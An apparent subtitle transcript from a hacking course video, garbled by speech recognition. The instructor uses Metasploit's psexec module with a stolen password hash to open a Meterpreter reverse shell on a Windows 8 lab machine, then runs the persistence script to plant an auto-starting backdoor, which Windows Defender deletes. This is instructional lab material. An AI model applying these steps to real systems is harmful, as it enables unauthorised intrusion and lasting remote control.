1
00:00:00,360 --> 00:00:04,740
‫So let's try to use them interpreter's persistence method in a Windows eight victim.

2
00:00:15,480 --> 00:00:22,290
‫As you know, we need to have him interpretor session on the victim first, so I'm going to use Pesek

3
00:00:22,320 --> 00:00:24,840
‫module to get the session on my Windows eight.

4
00:00:26,360 --> 00:00:27,760
‫Search Pesek.

5
00:00:28,970 --> 00:00:41,780
‫Use exploit windows smb pesek set payload windows, interpretor, reverse TCP now show the options and

6
00:00:41,780 --> 00:00:47,150
‫now set the options are host as Windows eight L host as Colly.

7
00:00:48,920 --> 00:00:54,770
‫Username of my Windows eight was admin and password hash was on the desktop.

8
00:00:57,030 --> 00:01:08,520
‫Here, so I'll copy it and paste, as the SNP past now leave the ports by default values and run the

9
00:01:08,520 --> 00:01:09,090
‫exploit.

10
00:01:12,850 --> 00:01:17,770
‫There now we have an interpreter session on the Windows eight system.

11
00:01:19,000 --> 00:01:22,960
‫So we're in this info to check the system and the connection.

12
00:01:23,910 --> 00:01:25,350
‫And here are the results.

13
00:01:28,110 --> 00:01:32,820
‫So now let's run the persistance method with H first to see the parameters.

14
00:01:33,820 --> 00:01:36,160
‫And now we're ready to prepare the comen.

15
00:01:37,600 --> 00:01:39,940
‫A to start handler automatically.

16
00:01:40,900 --> 00:01:49,480
‫Now, I don't set the payload this time because the default payload is exactly what I want X to auto

17
00:01:49,480 --> 00:01:51,010
‫start when the system Boutte's.

18
00:01:52,460 --> 00:01:55,160
‫And ten seconds between each try.

19
00:01:56,120 --> 00:02:04,790
‫P for the port, no, I'll use the Port six six six six this time and finally are for the listen host,

20
00:02:05,120 --> 00:02:10,220
‫which is calling for me to to to hit enter, to run the method.

21
00:02:12,000 --> 00:02:18,750
‫And it's finished, so let's look at the messages to see what happened, it says The persistent script

22
00:02:18,750 --> 00:02:21,870
‫has been written to the temp folder under the Windows Phone.

23
00:02:22,410 --> 00:02:25,660
‫So let's look at the victim machine and see if that's correct.

24
00:02:26,520 --> 00:02:29,790
‫We'll go to the temp folder and Windows Explorer.

25
00:02:31,040 --> 00:02:39,440
‫Oh, Windows Defender detected the file, so to cross-check, I go to the temp folder to see whether

26
00:02:39,440 --> 00:02:41,080
‫the script file is in there or not.

27
00:02:43,570 --> 00:02:52,120
‫No, the script is not here, it's detected by Windows Defender and deleted, so we should find another

28
00:02:52,120 --> 00:02:54,340
‫way to open a persistent back door.

29
00:02:55,000 --> 00:02:56,350
‫There's always more than one way.